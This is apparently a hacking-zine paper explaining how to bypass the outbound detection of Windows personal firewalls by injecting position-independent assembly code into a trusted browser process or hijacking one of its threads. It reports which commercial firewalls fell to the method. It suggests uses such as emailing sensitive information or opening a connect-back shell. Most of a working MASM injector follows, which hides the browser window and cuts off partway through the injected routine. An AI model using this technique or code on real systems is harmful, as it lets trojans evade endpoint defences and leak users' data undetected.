+
+ This entire document refers to a feature of software firewalls
+ available for Windows OS, which is called "outbound detection".
+ This feature has nothing to do with the original idea of a
+ firewall, blocking incomming packets from the net: The outbound
+ detection mechanism is ment to protect the user from malicious
+ programs that run on his own computer - programs attempting to
+ communicate with a remote host on the Internet and thereby
+ leaking sensible information. In general, the outbound detection
+ controls the communication of local applications with the
+ Internet.
+
+ In a world with an increasing number of trojan horses, worms
+ and virii spreading in the wild, this is actually a very handy
+ feature and certainly, it is of good use. However, ever since 
+ I know about software firewalls, I have been wondering whether
+ they could actually provide a certain level of security at all:
+ After all, they are just software supposed protect you against
+ other software, and this sounds like bad idea to me. 
+
+ To make a long story short, this outbound detection can be
+ bypassed, and that's what will be discussed in this paper.
+ I moreover believe that if it is possible to bypass this one
+ restriction, it is somehow possible to bypass other restrictions
+ as well. Personal firewalls are software, trying to control
+ another piece of software. It should in any case be possible
+ to turn this around by 180 degrees, and create a piece of 
+ software that controls the software firewall.
+
+ Also, how to achieve this in practice is part of the discussion
+ that will follow: I will not just keep on talking about abstract
+ theory. It will be explained and illustrated with sample source
+ code how to bypass a software firewall by injecting code to a
+ trusted process. It might be interesting to you that the method
+ of runtime process infection that will be presented and explained
+ does not require an external DLL - the bypass can be performed
+ by a stand-alone and tiny executable.
+
+ Thus, this paper is also about coding, especially Win32 coding.
+ To understand the sample code, you should be familiar with
+ Windows, the Win32 API and basic x86 Assembler. It would also be 
+ good to know something about the PE format and related things,
+ but it is not necessary, as far as I can see. I will try to
+ explain everything else as precisely as possible. 
+
+ Note: If you find numbers enclosed in normal brackets within
+ the document, these numbers are references to further sources.
+ See [0x0A] for more details.
+
+
+
+-[0x02] :: how software firewalls work -----------------------------------
+
+ Of course, I can only speak about the software firewalls I have
+ seen and tested so far, but I am sure that these applications
+ are among the most widely used ones. Since all of them work in a
+ very similar way, I assume that the concept is a general concept
+ of software firewalls. 
+
+ Almost every modern software firewall provides features that
+ simulate the behaviour of hardware firewalls by allowing the
+ user to block certain ports. I have not had a close look on
+ these features and once more I want to emphasize that breaking
+ these restrictions is outside the scope of this paper. 
+
+ Another important feature of most personal firewalls is the 
+ concept of giving privileges and different levels of trust to
+ different processes that run on the local machine to provide a
+ measure of outbound detection. Once a certain executable creates
+ a process attempting to access the network, the executable file
+ is checksummed by the software firewall and the user is prompted
+ whether or not he wants to trust the respective process.
+
+ To perform this task, the software firewall is most probably
+ installing kernel mode drivers and hooks to monitor and intercept
+ calls to low level networking routines provided by the Windows OS
+ core. Appropriately, the user can trust a process to connect() to
+ another host on the Internet, to listen() for connections or to
+ perform any other familiar networking task. The main point is: As
+ soon as the user gives trust to an executable, he also gives
+ trust to any process that has been created from that executable.
+ However, once we change the executable, its checksum would no
+ longer match and the firewall would be alerted. 
+
+ So, we know that the firewall trusts a certain process as long as
+ the executable that created it remains the same. We also know that
+ in most cases, a user will trust his webbrowser and his email
+ client.
+
+
+
+
+-[0x03] :: process Infection without external .dll -----------------------
+
+ The software firewall will only calculate and analyze the checksum
+ for an executable upon process creation. After the process has
+ been loaded into memory, it is assumed to remain the same until it
+ terminates.
+
+ And since I have already spoken about runtime process infection, 
+ you certainly have guessed what will follow. If we cannot alter
+ the executable, we will directly go for the process and inject
+ our code to its memory, run it from there and bypass the firewall
+ restriction. 
+
+ If this was a bit too fast for you, no problem. A process is
+ loaded into random access memory (RAM) by the Windows OS as soon
+ as a binary, executable file is executed. Simplified, a process
+ is a chunk of binary data that has been placed at a certain
+ address in memory. In fact, there is more to it. Windows does a
+ lot more than just writing binary data to some place in memory.
+ For making the following considerations, none of that should
+ bother you, though.
+
+ For all of you who are already familiar with means of runtime
+ process infection - I really dislike DLL injection for this
+ purpose, simply because there is definitely no option that could
+ be considered less elegant or less stealthy.
+
+ In practice, DLL injection means that the executable that
+ performs the bypass somehow carries the additional DLL it
+ requires. Not only does this heaviely increase the size of the
+ entire code, but this DLL also has to be written to HD on the
+ affected system to perform the bypass. And to be honest - if 
+ you are really going to write some sort of program that needs
+ a working software firewall bypass, you exactly want to avoid 
+ this sort of flaws. Therefore, the presented method of runtime
+ process infection will work completely without the need of any
+ external DLL and is written in pure x86 Assembly.
+
+ To sum it all up: All that is important to us now is the ability
+ to get access to a process' memory, copy our own code into that
+ memory and execute the code remotely in the context of that
+ process.
+
+ Sounds hard? Not at all. If you have a well-founded knowledge of
+ the Win32 API, you will also know that Windows gives a programmer
+ everything he needs to perform such a task. The most important
+ API call that comes to mind probably is CreateRemoteThread().
+ Quoting MSDN (1):
+
+  The CreateRemoteThread function creates a thread that 
+  runs in the address space of another process. 
+
+  HANDLE CreateRemoteThread(
+    HANDLE hProcess,
+    LPSECURITY_ATTRIBUTES lpThreadAttributes,
+    DWORD dwStackSize,
+    LPTHREAD_START_ROUTINE lpStartAddress,
+    LPVOID lpParameter,
+    DWORD dwCreationFlags,
+    LPDWORD lpThreadId
+  );
+
+ Great, we can execute code at a certain memory address inside
+ another process and we can even pass one DWORD of information as
+ a parameter to it. Moreover, we will need the following 2 API
+ calls:
+   
+  VirtualAllocEx() 
+  WriteProcessMemory() 
+
+ they give us the power to inject our own arbitrary code to the
+ address space of another process - and once it is there, we will
+ create a thread remotely to execute it.
+ 
+ To sum everything up: We will create a binary executable that
+ carries the injection code as well as the code that has to be
+ injected in order to bypass the software firewall. Or, speaking
+ in high-level programming terms: We will create an exe file that
+ holds two functions, one to inject code to a trusted process
+ and one function to be injected.
+ 
+
+
+-[0x04] :: problems of this implementation -------------------------------
+
+ It all sounds pretty easy now, but it actually is not. For
+ instance, you will barely be able to write an application in C
+ that properly injects another (static) C function to a remote
+ process. In fact, I can almost guarantee you that the remote
+ process will crash. Although you can call the relevant API calls
+ from C, there are much more underlying problems with using a
+ high level language for this purpose. The essence of all these
+ problems can be summed up as follows: compilers produce ASM code
+ that uses hardcoded offsets. A simple example: Whenever you use
+ a constant C string, this C string will be stored at a certain
+ position within the memory of your resulting executable, and any
+ reference to it will be hardcoded. This means, when your process
+ needs to pass the address of that string to a function, the
+ address will be completely hardcoded in the binary code of your
+ executable. 
+
+ Consider: 
+
+  void main() {
+      printf("Hello World");
+      return 0;
+  }
+
+ Assume that the string "Hello World" is stored at offset 0x28048
+ inside your executable. Moreover, the executable is known to
+ load at a base address of 0x00400000. In this case, the binary
+ code of your compiled and linked executable will somewhere refer
+ to the address 0x00428048 directly. 
+
+ A disassembly of such a sample application, compiled with Visual
+ C++ 6, looks like this:
+
+   00401597 ...
+   00401598 push 0x00428048  ; the hello world string
+   0040159D call 0x004051e0  ; address of printf
+   0040159E ...
+ 
+ What is the problem with such a hardcoded address? If you stay
+ inside your own address space, there is no problem. However ...
+ once you move that code to another address space, all those
+ memory addresses will point to entirely different things. The
+ hello world string in my example is more than 0x20000 = 131072
+ bytes away from the actual program code. So, if you inject that
+ code to another process space, you would have to make sure that
+ at 0x00428048, there is a valid C string ... and even if there
+ was something like a C string, it would certainly not be 
+ "Hello World". I guess you get the point.
+
+ This is just a simple example and does not even involve all the
+ problems that can occur. However, also the addresses of all
+ function calls are hardcoded, like the address of the printf
+ function in our sample. In another process space, these
+ functions might be somewhere else or they could even be missing
+ completely - and this leads to the most weird errors that you
+ can imagine. The only way to make sure that all the addresses
+ are correct and that every single CPU instruction fits, we have
+ to write the injected code in ASM.
+ 
+ Note: There are several working implementations for an outbound 
+ detection bypass for software firewalls on the net using a
+ dynamic link library injection. This means, the implementation
+ itself consists of one executable  and a DLL. The executable
+ forces a trusted process to load the DLL, and once it has been
+ loaded into the address space of this remote process, the DLL
+ itself performs any arbitrary networking task. This way to bypass
+ the detection works very well and it can be implemented in a high
+ level language easiely, but I dislike the dependency on an
+ external DLL, and therefore I decided to code a solution with one
+ single stand-alone executable that does the entire injection by
+ itself. Refer to (2) for an example of a DLL injection bypass.
+
+ Also, LSADUMP2 (3) uses exactly the same measure to grab
+ the LSA secrets from LSASS.EXE and it is written in C.
+
+
+
+-[0x05] :: how to implement it -------------------------------------------
+
+ Until now, everything is just theory. In practice, you will
+ always encounter all kinds of problems when writing code like
+ this. Furthermore, you will have to deal with detail questions
+ that have only partially to do with the main problem. Thus,
+ let us leave the abstract part behind and think about how to
+ write some working code.
+
+ Note: I strongly recommend you to browse the source code in
+ [A] while reading this part, and it would most definitely be a
+ good idea to have a look at it before reading [0x0B].
+
+ First of all, we want to avoid as much hardcoded elements as
+ possible. And the first thing we need is the file path to the
+ user's default browser. Rather than generally refering to 
+ "C:\Program Files\Internet Explorer\iexplore.exe", we will
+ query the registry key at "HKCR\htmlfile\shell\open\command".
+
+ Ok, this will be rather easy, I assume you know how to query
+ the registry. The next thing to do is calling CreateProcess().
+ The wShowWindow value of the STARTUP_INFO structure passed to
+ the function should be something like SW_HIDE in order to keep
+ the browser window hidden.
+
+ Note: If you want to make entirely sure that no window is
+ displayed on the user's screen, you should put more effort
+ into this. You could, for instance, install a hook to keep all
+ windows hidden that are created by the process or do similar
+ things. I have only tested my example with Internet Explorer
+ and the SW_HIDE trick works well with it. In fact, it should
+ work with most applications that have a more or less simple
+ graphical user interface.
+
+ To ensure that the process has already loaded the most
+ essential libraries and has reached a generally stable state,
+ we use the WaitForInputIdle() call to give the process some
+ time for intialization. 
+
+ So far, so good - now we proceed by calling VirtualAllocEx()
+ to allocate memory within the created process and with
+ WriteProcessMemory(), we copy our networking code. Finally, 
+ we use CreateRemoteThread() to run that code and then, we only
+ have to wait until the thread terminates. All in all, the
+ injection itself is not all that hard to perform.
+
+ The function that will be injected can receive a single 
+ argument, one double word. In the example that will be 
+ presented in [0x0B], the injected procedure connects to 
+ www.phrack.org on port 80 and sends a simple HTTP GET request.
+ After receiving the header, it displays it in a message box.
+ Since this is just a very basic example of a working firewall
+ bypass code, our injected procedure will do everything on its
+ own and does not need any further information.
+ 
+ However, we will still use the parameter to pass a 32 bit
+ value to our injected procedure: its own "base address". Thus,
+ the injected code knows at which memory address it has been 
+ placed, in the conetxt of the remote process. This is very
+ important as we cannot directly read from the EIP register
+ and because our injected code will sometimes have to refer to
+ memory addresses of data structures inside the injected code
+ itself.
+ 
+ Once injected and placed within the remote process, the 
+ injected code basically knows nothing. The first important
+ task is finding the kernel32.dll base address in the context
+ of the remote process and from there, get the address of the
+ GetProcAddress function to load everything else we need. I
+ will not explain in detail how these values are retrieved,
+ the entire topic cannot be covered by this paper. If you are
+ interested in details, I recommend the paper about Win32
+ assembly components by the Last Stage of Delirium research
+ group (4). I used large parts of their write-up for the 
+ code that will be described in the following paragraphs.
+
+ In simple terms, we retrieve the kernel32 base address from
+ the Process Environment Block (PEB) structure which itself
+ can be found inside the Thread Environment Block (TEB). The
+ offset of the TEB is always stored within the FS register,
+ thus we can easiely get the PEB offset as well. And since
+ we know where kernel32.dll has been loaded, we just need to
+ loop through its exports section to find the address of
+ GetProcAddress(). If you are not familiar with the PE format,
+ don't worry.
+
+ A dynamic link library contains a so-called exports section.
+ Within this section, the offsets of all exported functions
+ are assigned to human-readable names (strings). In fact,
+ there are two arrays inside this section that interest us.
+ There are actually more than 2 arrays inside the exports
+ section, but we will only use these two lists. For the rest
+ of this paper, I will treat the terms "list" and "array"
+ equally, the formal difference is of no importance at this
+ level of programming. One array is a list of standard,
+ null-terminated C-strings. They contain the function names.
+ The second list holds the function entry points (the
+ offsets). 
+
+ We will do something very similar to what GetProcAddress()
+ itself does: We will look for "GetProcAddress" in the first
+ list and find the function's offset within the second array
+ this way. 
+
+ Unfortunately, Microsoft came up with an idea for their DLL
+ exports that makes everything much more complicated. This
+ idea is named "forwarders" and basically means that one DLL
+ can forward the export of a function to another DLL. Instead
+ of pointing to the offset of a function's code inside the DLL,
+ the offset from the second array may also point to a null-
+ terminated string. For instance, the function HeapAlloc() from
+ kernel32.dll is forwarded to the RtlAllocateHeap function in
+ ntdll.dll. This means that the alleged offset of HeapAlloc()
+ in kernel32.dll will not be the offset of a function that has
+ been implemented in kernel32.dll, but it will actually be the
+ offset of a string that has been placed inside kernel32.dll.
+ This particular string is "NTDLL.RtlAllocateHeap".
+  
+ After a while, I could figure out that this forwarder-string
+ is placed immediately after the function's name in array #1.
+ Thus, you will find this chunk of data somewhere inside 
+ kernel32.dll:
+
+   48 65 61 70 41 6C 6C 6F    HeapAllo
+   63 00 4E 54 44 4C 4C 2E    c.NTDLL.
+   52 74 6C 41 6C 6C 6F 63    RtlAlloc
+   61 74 65 48 65 61 70 00    ateHeap.
+
+   = "HeapAlloc\0NTDLL.RtlAllocateHeap\0"
+
+ This is, of course, a bit confusing as there are now more null-
+ terminated strings in the first list than offsets in the second
+ list - every forwarder seems like a function name itself.
+ However, bearing this in mind, we can easiely take care of the
+ forwarders in our code.
+
+ To identify the "GetProcAddress" string, I also make use of a
+ hash function for short strings which is presented by LSD group
+ in their write-up (4). The hash function looks like this in C:
+
+ unsigned long hash(const char* strData) {
+   unsigned long hash = 0;
+   char* tChar = (char*) strData;
+   while (*tChar) hash = ((hash<<5)|(hash>>27))+*tChar++;
+   return hash;
+ }
+
+ The calculated hash for "GetProcAddr" is, 0x099C95590 and we
+ will search for a string in the exports section of kernel32.dll
+ that matches this string. Once we have the address of
+ GetProcAddress() and the base address of kernel32, we can
+ easiely load all other API calls and libraries we need. From
+ here, everything left to do is loading ws2_32.dll and using the
+ socket system calls from that library to do whatever we want. 
+
+ Note: I'd suggest to read [0x0B] now.
+
+
+
+-[0x06] :: limits of this implementation ---------------------------------
+
+ The sample code presented in this little paper will give you a
+ tiny executable that runs in RING3. I am certain that most
+ software firewalls contain kernel mode drivers with the ability
+ to perform more powerful tasks than this injector executable.
+ Therefore, the capabilities of the bypass code are obviously
+ limited. I have tested the bypass against several software
+ firewalls and got the following results:
+
+   Zone Alarm 4        vulnerable
+   Zone Alarm Pro 4    vulnerable
+   Sygate Pro 5.5      vulnerable
+   BlackIce 3.6        vulnerable
+   Tiny 5.0            immune
+
+ Tiny alerts the user that the injector executable spawns the
+ browser process, trying to access the network this way. It looks
+ like Tiny simply acts exactly like all the other software
+ firewalls do, but it is just more careful. Tiny also hooks API
+ calls like CreateProcess() and CreateRemoteThread() - thus, it
+ can protect its users from this kind of bypass.
+ 
+ Anyway, by the test results I obtained, I was even more
+ confirmed that software firewalls act as kernel mode drivers,
+ hooking API calls to monitor networking activity.
+
+ Thus, I have not presented a firewall bypass that works in 100%
+ of all possible cases. It is just an example, a proof for the
+ general possibility to perform a bypass.
+
+
+
+-[0x07] :: workaround: another infection method --------------------------
+
+ Phrack Staff suggested to present a workaround for the problem
+ with Tiny by infecting an already running, trusted process. 
+ I was certain that this would not be the only thing to take 
+ care of, since Tiny would most likely be hooking our best friend,
+ CreateRemoteThread(). Unfortunately, I actually figured out that
+ I had been right, and merely infecting an already running
+ process did not work against Tiny.
+
+ However, there are other ways to force execution of our own
+ injected code, and I will briefly explain my workaround for
+ those of you who are interested. All I am trying to prove here 
+ is that you can outsmart any software firewall if you put some
+ effort into coding an appropriate bypass.
+
+ The essential API calls we will need are GetThreadContext() and
+ appropriately, SetThreadContext(). These two briefly documented
+ functions allow you to modify the CONTEXT of a thread. What is
+ the CONTEXT of a thread? The CONTEXT structure contains the
+ current value of all CPU registers in the context of a certain
+ thread. Hence, with the two API calls mentioned above, you can
+ retrieve these values and, more importantly, apply new values
+ to each CPU register in the thread's context as well. Of high
+ interest to us is the EIP register, the instruction pointer for
+ a thread.
+
+ First of all, we will simply find an already running, trusted
+ process. Then, as always, we write our code to its memory using
+ the methods already discussed before. This time, however, we
+ will not create a new thread that starts at the address of our
+ injected code, we will rather hijack the primary thread of the
+ trusted process by changing its instruction pointer to the
+ address of our own code.
+
+ That's the essential theory behind this second bypass, at least.
+ In practice, we will proceed more cautiously to be as stealthy
+ as possible. First of all, we will not simply write the injection
+ function to the running process, but several other ASM codes as
+ well, in order to return to the original context of the hijacked
+ thread once our injected code has finished its work. As you can
+ see from the ASM source code in [0x0C], we want to copy a chunk
+ of shellcode to the process that looks like this in a debugger:
+  
+  <base + 0x00> PUSHAD             ; safe all registers
+  <base + 0x01> PUSHFD             ; safe all flags
+  <base + 0x02> PUSH <base + 0x13> ; first argument: own address
+  <base + 0x07> CALL <base + 0x13> ; call the injected code
+  <base + 0x0C> POPFD              ; restore flags
+  <base + 0x0D> POPAD              ; restore registers
+  <base + 0x0E> JMP <orignal EIP>  ; "restore" original context
+  <base + 0x13> ...                ; inject function starts here
+
+ Remember, this code is being injected at a memory offset very
+ far away from the original context of the thread. That's why
+ we will need a 4 byte - relative address for the JMP.
+
+ All in all, this is an easy and simple solution to avoid that
+ our trusted process just crashes after the injected code has
+ run. Moreover, I decided to use an event object that becomes
+ signaled by the injected code once the HTTP request has been
+ performed successfully. This way, the injector executable
+ itself is informed once the injected routine has finished its
+ job. We can then deallocate the remote memory and perform a
+ general cleanup. Stealthieness is everything.
+
+ I should say that [0x0C] is a bit more fragile and less reliable
+ than the first bypass shown in [0x0B]. However, this second one
+ will definitely work against all tested firewalls and most
+ probably also against others. Nevertheless, you should bear in
+ mind that it assumes Internet Explorer to be a trusted process
+ without looking up anything in the registry or elsewhere.
+
+ Furthermore, I only used this second bypass together with a 
+ running instance of Internet Explorer, other applications might
+ require you not to hijack the primary thread, but another one.
+ The primary thread is usually a safe bet as we can assume that
+ it does not block or idle at the moment of infection. However,
+ it could theoretically also happen that the program's interface
+ suddenly freezes because the injected code is running rather 
+ than the code that was intended to run. With this very sample
+ program and internet explorer, I did not encounter such
+ problems, though. It also works with "OUTLOOK.EXE" and others, 
+ so I think it can be considered a good and stable approach.
+  
+
+
+-[0x08] :: conclusion ----------------------------------------------------
+
+ I feel that I can be satisfied with the test results I obtained.
+ Although the injector executable is generally inferior to a
+ kernel mode software firewall, it could easiely trick 80% of the
+ most popular software firewall products.  
+
+ My second bypass even works against all of them, and I am as sure
+ as I can be that an appropriate bypass can actually be coded for
+ every single software firewall. Both of the sample codes merely
+ send a simple HTTP request, but it would actually be quite easy
+ to have them perform any other networking task. For instance,
+ sending an email with sensitive information would work exactly
+ the same way. The injected code would just have to be more 
+ sophisticated or rather, larger than the sample provided here. 
+
+ Bearing in mind that I achieved this with a 5k user-mode
+ application, I am certain that it would be even more easy to
+ bypass any software firewall with an appropriate piece of code
+ running in RING0, eventually hooking low level calls itself.
+ Who knows, perhaps this technique is already being used by
+ people who did the same sort of research. The overall conclusion
+ is: software firewalls are insecure. And I am very much at ease
+ with this generalization: The concept of a software firewall,
+ not the implementation, is the main problem.
+
+ Software can not protect you from other software without being
+ at constant risk to be tricked by another piece of software
+ again. 
+
+ Why is this a risk? This is in fact a huge risk because software
+ firewalls ARE being used on Windows Workstations widely. Within
+ a network, it is commonplace to use both software and hardware
+ firewalls. Moreover, the software firewalls in such networks only
+ serve the very purpose of protecting the network from backdoor
+ programs by supplying some sort of outbound detection. And after
+ all, this protection is obviously too weak.
+
+ Apart from the danger for privately used computers, which have
+ hereby been proven to be insufficiently protected against trojan
+ horses and worms, exploitation of a remote Windows Workstation 
+ using a software firewall can most definitely involve the use of
+ methods described in this paper. The ASM code for the two bypass
+ samples can be transformed into shellcode for any remote Windows
+ exploit. Once a service a Windows network is found to be
+ vulnerable to a remote exploit, it would be also possible to
+ overcome the outbound detection of the respective software
+ firewall this way.
+
+ The sample applications connect to www.phrack.org on port 80,
+ but you can actually infect a trusted process and have it
+ do about anything along the lines of providing a shell by
+ connecting back to your IP.
+
+
+
+-[0x09] :: Last Words ----------------------------------------------------
+
+ I'd like to emphasize that I am not responsible for anyone using
+ that sample code with his/her homemade trojan to leech porn from
+ his friend's PC. Seriously, this is just a sample for educational
+ purposes, it should not be used for any kind of illegal purpose. 
+ 
+ Thanks a lot to Paris2K for helping me with developing and
+ testing the injector app. Good luck and success with your thesis.
+
+ Greets and thanks to drew, cube, the_mystic - and also many
+ thanks to you, jason ... for all your helpful advice. 
+
+ If you want or need to contact me:
+
+
+   Email, MSN - rattle@awarenetwork.org
+          ICQ - 74684282
+      Website - http://www.awarenetwork.org/
+
+
+ .aware
+
+
+
+-[0x0A] :: References ----------------------------------------------------
+
+ These are links to projects and papers that have been 
+ referenced somewhere inside this document.
+ 
+ (1) The MSDN library provides Windows programmers with almost
+     all the reference they need, no doubt about that.
+
+     http://msdn.microsoft.com/
+ 
+ (2) Another project that bypasses the outbound detection
+     of software firewalls. Unfortunately, no source code
+     is available and it also uses and external DLL:
+
+     http://keir.net/firehole.html
+
+ (3) LSADUMP2 is the only C source code I found that 
+     illustrates the method of injecting a DLL into another
+     process' address space:
+
+     http://razor.bindview.com/tools/desc/lsadump2_readme.html
+ 
+ (4) Many respect to the LSD research group for their nice
+     and easy-to-read paper "Win32 Assembly Components":
+
+     http://www.lsd-pl.net/documents/winasm-1.0.1.pdf
+
+     Perhaps you might want to check out their entire projects
+     section:
+
+     http://lsd-pl.net/projects.html
+
+ (5) Negatory Assembly Studio is my favourite x86 ASM IDE, 
+     as far as an IDE for Assembly makes sense at all. You
+     might need it for the ASM source code provided as I
+     make use of it's "standard library" for Win32 calls:
+
+     http://www.negatory.com/asmstudio/
+
+
+
+
+-[0x0B] :: injector.exe source code --------------------------------------
+
+Here you go, this is the injector ASM code. I used Negatory Assembly
+Studio 1.0 to create the executable, a nice freeware IDE for creating
+programs in ASM for Windows (5). It internally uses the MASM Assembler
+and linker, so you might also manage to use the code with MASM only
+(you will be lacking the includes, though).
+
+
+.386
+.MODEL flat, stdcall
+
+  INCLUDE   windows.inc
+  INCLUDE   kernel32.inc
+  INCLUDE   advapi32.inc
+  INCLUDE   user32.inc
+
+
+  bypass    PROTO NEAR STDCALL, browser:DWORD  ; injector function
+  inject    PROTO NEAR STDCALL, iBase:DWORD    ; injected function
+        
+
+;       The PSHS macro is used to push the address of some
+;       structure onto the stack inside the remote process'
+;       address space. iBase contains the address where the
+;       injected code starts. 
+
+PSHS    MACRO  BUFFER
+        MOV    EDX, iBase
+        ADD    EDX, OFFSET BUFFER - inject
+        PUSH   EDX
+        ENDM
+               
+;       The LPROC macro assumes that pGetProcAddress holds
+;       the address of the GetProcAddress() API call and
+;       simulates its behaviour. PROCNAME is a string inside
+;       the injected code that holds the function name and
+;       PROCADDR is a DWORD variable inside the injected
+;       code that will retrieve the address of that function.
+;       BASEDLL, as the name suggests, should hold the 
+;       base address of the appropriate DLL.
+         
+LPROC   MACRO  BASEDLL, PROCNAME, PROCADDR
+        PSHS   PROCNAME
+        PUSH   BASEDLL
+        CALL   pGetProcAddress
+        EJUMP  INJECT_ERROR
+        MOV    PROCADDR, EAX
+        ENDM
+
+EJUMP   MACRO  TARGET_CODE ; jump when EAX is 0.
+        CMP    EAX, 0
+        JE     TARGET_CODE
+        ENDM        
+            
+
+.DATA
+
+        sFail               DB  "Injection failed.",0
+        sCapFail            DB  "Failure",0
+
+        REG_BROWSER_SUBKEY  DB  "htmlfile\shell\open\command",0
+        REG_BROWSER_KEY     DD  ?
+        
+        BROWSER             DB  MAX_PATH DUP(0)
+        BR_SIZE             DD  MAX_PATH
+
+        FUNCSZE             EQU inject_end - inject
+          
+.CODE
+
+
+Main:   ; We retrieve the defaul browser path from the
+        ; registry by querying HKCR\htmlfile\shell\open\command
+
+
+        INVOKE  RegOpenKey, HKEY_CLASSES_ROOT, \
+                ADDR REG_BROWSER_SUBKEY, ADDR REG_BROWSER_KEY
+
+        CMP     EAX, ERROR_SUCCESS
+        JNE     RR
+        
+        INVOKE  RegQueryValue, REG_BROWSER_KEY, \
+                EAX, ADDR BROWSER, ADDR BR_SIZE
+
+        INVOKE  RegCloseKey, REG_BROWSER_KEY
+
+
+        ; Now we call the bypass function by supplying the
+        ; path to the browser as the first argument.
+        
+        INVOKE  bypass, OFFSET BROWSER
+
+
+RR:     INVOKE  ExitProcess, 0
+    
+ 
+    
+bypass  PROC NEAR STDCALL, browser:DWORD
+
+        LOCAL   sinf                 :STARTUPINFO
+        LOCAL   pinf                 :PROCESS_INFORMATION
+        
+        LOCAL   dwReturn             :DWORD ; return value
+        LOCAL   dwRemoteThreadID     :DWORD ; thread ID
+        LOCAL   thRemoteThreadHandle :DWORD ; thread handle
+        LOCAL   pbRemoteMemory       :DWORD ; base address 
+
+
+        ; Get our own startupinfo details out of lazieness
+        ; and alter the wShowWindow attribute to SW_HIDE
+
+        INVOKE  GetStartupInfo,ADDR sinf
+        MOV     sinf.wShowWindow, SW_HIDE
+
+        
+        ; Create the brwoser process and WaitForinputIdle()
+        ; to give it some time for initialization
+
+        INVOKE  CreateProcess,0,browser,0,0,0,0,0,0, \
+                ADDR sinf,ADDR pinf                        
+        EJUMP   ERR_CLEAN
+                        
+        INVOKE  WaitForInputIdle, pinf.hProcess, 10000
+        CMP     EAX,0
+        JNE     ERR_CLEAN
+        
+        MOV     EBX, pinf.hProcess
+        MOV     ECX, pinf.hThread
+
+
+        ; Allocate memory in the remote process' address
+        ; space and use WriteProcessMemory() to copy the
+        ; code of the inject procedure.
+        
+        MOV     EDX, FUNCSZE
+        INVOKE  VirtualAllocEx,EBX,0,EDX,MEM_COMMIT, \
+                PAGE_EXECUTE_READWRITE
+        EJUMP   ERR_SUCC
+        
+        MOV     pbRemoteMemory,EAX
+        MOV     EDX,FUNCSZE        
+        
+        INVOKE  WriteProcessMemory,EBX,pbRemoteMemory, \
+                inject, EDX, 0
+        EJUMP   ERR_CLEAN_VF
+        
+
+        ; The code has been copied, create a thread that
+        ; starts at the remote address
+
+        INVOKE  CreateRemoteThread,EBX,0,0,pbRemoteMemory, \
+                pbRemoteMemory, 0, ADDR dwRemoteThreadID        
+        EJUMP   ERR_CLEAN_TH
+        
+        MOV     thRemoteThreadHandle,EAX
+        MOV     dwReturn,0
+
+
+        ; Wait until the remote thread terminates and see what the
+        ; return value looks like. The inject procedure will return
+        ; a boolean value in EAX, indicating whether or not it was
+        ; successful.
+        
+        INVOKE  WaitForSingleObject,thRemoteThreadHandle,INFINITE
+        INVOKE  GetExitCodeThread,thRemoteThreadHandle,ADDR dwReturn
+        
+        ; If the return value equals 0, an error has occured and we
+        ; will display a failure MessageBox() 
+
+        CMP     dwReturn, 0
+        JNE     ERR_CLEAN_TH
+ 
+        INVOKE  MessageBox, 0, OFFSET sFail, OFFSET sCapFail, 16
+        
+ERR_CLEAN_TH:
+        INVOKE  CloseHandle,thRemoteThreadHandle
+ERR_CLEAN_VF:
+        INVOKE  VirtualFreeEx, EBX, pbRemoteMemory, 0, MEM_RELEASE
+ERR_CLEAN:
+        INVOKE  TerminateProcess, EBX, 0
+        INVOKE  CloseHandle,pinf.hThread
+        INVOKE  CloseHandle,pinf.hProcess
+ERR_SUCC:
+        RET
+
+bypass  ENDP 
+
+
+
+inject  PROC NEAR STDCALL, iBase:DWORD
+
+        LOCAL k32base          :DWORD
+        LOCAL expbase          :DWORD
+        LOCAL forwards         :DWORD
+                        
+        LOCAL pGetProcAddress  :DWORD
+        LOCAL pGetModuleHandle :DWORD
+        LOCAL pLoadLibrary     :DWORD
+        LOCAL pFreeLibrary     :DWORD
+                        
+        LOCAL pMessageBox      :DWORD
+        LOCAL u32base          :DWORD
+        LOCAL ws32base         :DWORD
+                        
+        LOCAL pWSAStartup      :DWORD
+        LOCAL pWSACleanup      :DWORD
+        
+        LOCAL pSocket          :DWORD
+        LOCAL pConnect         :DWORD
+        LOCAL pSend            :DWORD
+        LOCAL pRecv            :DWORD
+        LOCAL pClose           :DWORD
+                        
+        JMP IG
+
+
+        sGetModuleHandle DB "GetModuleHandleA" ,0
+        sLoadLibrary     DB "LoadLibraryA"     ,0
+        sFreeLibrary     DB "FreeLibrary"      ,0
+                        
+        sUser32          DB "USER32.DLL"       ,0
+        sMessageBox      DB "MessageBoxA"      ,0
+                        
+        sGLA             DB "GetLastError"     ,0
+        sWLA             DB "WSAGetLastError"  ,0
+                        
+        sWS2_32          DB "ws2_32.dll"       ,0
+        sWSAStartup      DB "WSAStartup"       ,0
+        sWSACleanup      DB "WSACleanup"       ,0
+        sSocket          DB "socket"           ,0
+        sConnect         DB "connect"          ,0
+        sSend            DB "send"             ,0
+        sRecv            DB "recv"             ,0
+        sClose           DB "closesocket"      ,0
+
+        wsa LABEL BYTE
+         wVersion        DW 0
+         wHighVersion    DW 0
+         szDescription   DB WSADESCRIPTION_LEN+1 DUP(0)
+         szSystemStatus  DB WSASYS_STATUS_LEN+1 DUP(0)
+         iMaxSockets     DW 0
+         iMaxUdpDg       DW 0
+         lpVendorInfo    DD 0
+                        
+        sAddr LABEL BYTE
+         sin_family      DW AF_INET
+         sin_port        DW 05000H
+         sin_addr        DD 006EE3745H
+         sin_zero        DQ 0
+                        
+
+                
+        sStartC          DB "SetUp Complete",0
+        sStart           DB "Injector SetUp complete. ", \
+                            "Sending request:",13,10,13,10
+                
+        sRequ            DB "GET / HTTP/1.0",13,10, \
+                            "Host: www.phrack.org",\
+                            13,10,13,10,0
+                        
+        sCap             DB "Injection successful",0
+        sRepl            DB 601 DUP(0)
+
+                  
+IG:     ASSUME  FS:NOTHING           ; This is a MASM error bypass.      
+
+        MOV     EAX, FS:[030H]       ; Get the Process Environment Block
+        TEST    EAX, EAX             ; Check for Win9X
+        JS      W9X
+
+WNT:    MOV     EAX, [EAX+00CH]      ; WinNT: get PROCESS_MODULE_INFO
+        MOV     ESI, [EAX+01CH]      ; Get fLink from ordered module list
+        LODSD                        ; Load the address of bLink into eax
+        MOV     EAX, [EAX+008H]      ; Copy the module base from the list
+        JMP     K32                  ; Work done
+
+W9X:    MOV     EAX, [EAX+034H]      ; Undocumented offset (0x34)
+        LEA     EAX, [EAX+07CH]      ; ...
+        MOV     EAX, [EAX+03CH]      ; ...
+K32:    MOV     k32base,EAX          ; Keep a copy of the base address
+        MOV     pGetProcAddress, 0   ; now search for GetProcAddress
+        MOV     forwards,0           ; Set the forwards to 0 initially
+
